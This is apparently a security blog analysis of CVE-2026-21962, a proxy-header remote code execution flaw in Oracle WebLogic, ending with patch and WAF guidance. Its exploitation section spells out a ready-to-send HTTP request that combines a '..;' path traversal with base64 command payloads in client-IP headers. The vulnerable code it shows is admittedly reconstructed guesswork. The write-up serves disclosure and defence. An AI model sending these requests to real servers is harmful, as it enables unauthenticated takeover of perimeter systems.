Gatekeeper Down: The Oracle WebLogic Proxy RCE (CVE-2026-21962)

Oracle WebLogic is the enterprise software equivalent of a zombie in a horror movie: just when you think you've secured it, it crashes through the window with a new critical RCE. This time, the call is coming from inside the house—specifically, the Oracle WebLogic Server Proxy Plug-in. This component is the traffic cop of the Oracle ecosystem, sitting on the edge (often inside Apache or IIS) and routing requests to backend WebLogic servers. It is the literal gatekeeper.

What makes CVE-2026-21962 so particularly nasty is that it targets the mechanism designed to protect the backend. Usually, this proxy filters out dangerous internal paths. However, thanks to some questionable parsing logic, it not only lets attackers slip past the velvet rope but also hands them a microphone to command the server. It’s a CVSS 10.0 for a reason: unauthenticated remote code execution on the edge of the network is the holy grail for attackers.

Why is this component juicy? Because it handles WL-Proxy-Client-IP and X-Forwarded-For headers. In a sane world, these headers just contain IP addresses. In Oracle's world, apparently, they are treated as trusted inputs that can trigger internal command processing. If you are running Oracle HTTP Server or the WebLogic Proxy Plug-in, you are currently holding a live grenade.

This vulnerability is a masterclass in "chaining bad decisions." It relies on two distinct failures working in perfect harmony: a Path Traversal Bypass and Unsafe Header Parsing.

1. The Bouncer is Blind (Path Traversal) The first flaw is in how the Proxy Plug-in normalizes URLs. The plugin is configured to block access to internal endpoints like /bea_wls_internal/. However, the parser has a blind spot for the semicolon character in directory traversal sequences. By requesting /weblogic//weblogic/..;/bea_wls_internal/ProxyServlet, the attacker confuses the path normalization routine. The server sees the ..; and thinks, "Oh, this is just a file name or a parameter," while the filesystem or the servlet mapping logic interprets it as "go up one directory." This creates a discrepancy between what the security filter sees (a safe path) and what is actually executed (the forbidden internal servlet).

2. The IP Address that executes 'whoami' (Header Injection) Once the attacker reaches the internal ProxyServlet, the second flaw kicks in. This servlet is designed to handle proxy headers to identify client IPs. It looks at headers like WL-Proxy-Client-IP, Proxy-Client-IP, and X-Forwarded-For. The fatal flaw is that the code attempts to parse these headers using a semicolon delimiter. Instead of strictly validating that the header contains only an IP address, it splits the string and seemingly processes the second part of the split. If that second part is a base64-encoded string, the server decodes it and—in a move that defies all logic—executes it or treats it as a serialized object that leads to execution. It is effectively eval() on an HTTP header.

While the proprietary source code isn't public, we can reconstruct the logic based on the behavior and the patch analysis. The vulnerability exists in the intersection of the Apache/IIS module and the backend Servlet.

The Normalization Failure

The proxy plugin likely uses a normalization function that stops stripping traversal characters when it encounters a semicolon, assuming it marks the start of path parameters (Matrix parameters).

Vulnerable Logic Concept:

// Simplified logic representation
char* path = request->uri;
if (strstr(path, "/bea_wls_internal/")) {
    return ACCESS_DENIED; // Explicit block
}
 
// But if we send: /weblogic/..;/bea_wls_internal/
// The normalization might return: /weblogic/..;/bea_wls_internal/
// The checks fail to resolve '..;' to parent directory before string comparison.
// The request is forwarded.

The Execution Engine

Inside the ProxyServlet (Java), the handling of the client IP header is where the RCE lives. It seemingly expects a format like IP;Metadata.

Vulnerable Java Logic Concept:

String proxyHeader = request.getHeader("WL-Proxy-Client-IP");
if (proxyHeader != null && proxyHeader.contains(";")) {
    String[] parts = proxyHeader.split(";");
    String ip = parts[0];
    String metadata = parts[1]; // The malicious payload
    
    // The fatal mistake: Deserializing or Executing the metadata
    byte[] decoded = Base64.getDecoder().decode(metadata);
    executeInternalCommand(decoded); 
}

This pattern—trusting the secondary data in an IP forwarding header—is an architectural sin. The patch likely involves removing the semicolon splitting logic entirely or strictly validating that the header value matches an IP address regex (e.g., ^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$).

Exploiting this requires no authentication, no special tools, and no complex race conditions. It is a single HTTP request. We simply need to construct a URL that triggers the path traversal and include the poisoned headers.

Step 1: Crafting the Payload

We want to execute id.

1. Take the command: cmd:id (or similar internal command syntax expected by the servlet).
2. Base64 encode it: Y21kOmlk.
3. Append it to a loopback IP with a semicolon: 127.0.0.1;Y21kOmlk.

Step 2: The Request

We send this payload in the WL-Proxy-Client-IP header. We also target the specific traversal path known to bypass the plugin's filters.

GET /weblogic//weblogic/..;/bea_wls_internal/ProxyServlet HTTP/1.1
Host: vulnerable-target.com
User-Agent: Mozilla/5.0 (compatible; Exploit/1.0)
WL-Proxy-Client-IP: 127.0.0.1;Y21kOmlk
Proxy-Client-IP: 127.0.0.1;Y21kOmlk
X-Forwarded-For: 127.0.0.1;Y21kOmlk
Connection: close

Step 3: Execution

When the server processes this request:

1. The URL /weblogic//weblogic/..;/ tricks the frontend proxy into thinking it's a valid public path.
2. The request is forwarded to the backend ProxyServlet.
3. The Servlet reads WL-Proxy-Client-IP.
4. It splits at ;.
5. It decodes Y21kOmlk.
6. It executes the command.

The response will typically contain the output of the command, or the side effects will be visible (e.g., a reverse shell connection back to the attacker).

A CVSS 10.0 is not handed out lightly. The impact here is absolute. Because this vulnerability affects the Oracle HTTP Server and Proxy Plug-ins, the compromised component often resides in the DMZ. It is the bridge between the wild internet and the sensitive internal application servers.

Immediate Consequences:

• Full System Compromise: The RCE runs with the privileges of the web server process (often oracle or weblogic, sometimes root if misconfigured).
• Lateral Movement: From the DMZ, the attacker can pivot to the backend databases, the internal WebLogic clusters, and other connected systems.
• Data Exfiltration: Attackers can modify the proxy logic to sniff traffic, stealing credentials and session tokens from legitimate users passing through the proxy.

This is not just about defacing a website; it is about gaining a persistent foothold at the network perimeter. In ransomware scenarios, this is the perfect entry point—low effort, high privilege, and usually exempt from strict internal firewall rules because it is the proxy.

If you are running Oracle Fusion Middleware, stop reading and start patching. Oracle released the fix in the January 2026 Critical Patch Update (CPU).

Primary Mitigation: Apply the Patch Ensure you update the following components to the patched versions:

• Oracle HTTP Server: 12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0
• Oracle WebLogic Server Proxy Plug-in: 12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0

Secondary Defense: WAF Rules If you cannot patch immediately (why?), you must implement aggressive WAF rules.

1. Block Traversal Patterns: Reject any URI containing ..;.
2. Sanitize Headers: Reject any request where WL-Proxy-Client-IP, Proxy-Client-IP, or X-Forwarded-For contains a semicolon (;). There is rarely a legitimate reason for a semicolon in an IP address header.

Verification After patching, verify the fix by running the provided exploit simulator (safely) against your environment. The server should return a 403 Forbidden or 404 Not Found for the traversal path, and it definitely shouldn't execute commands from the headers.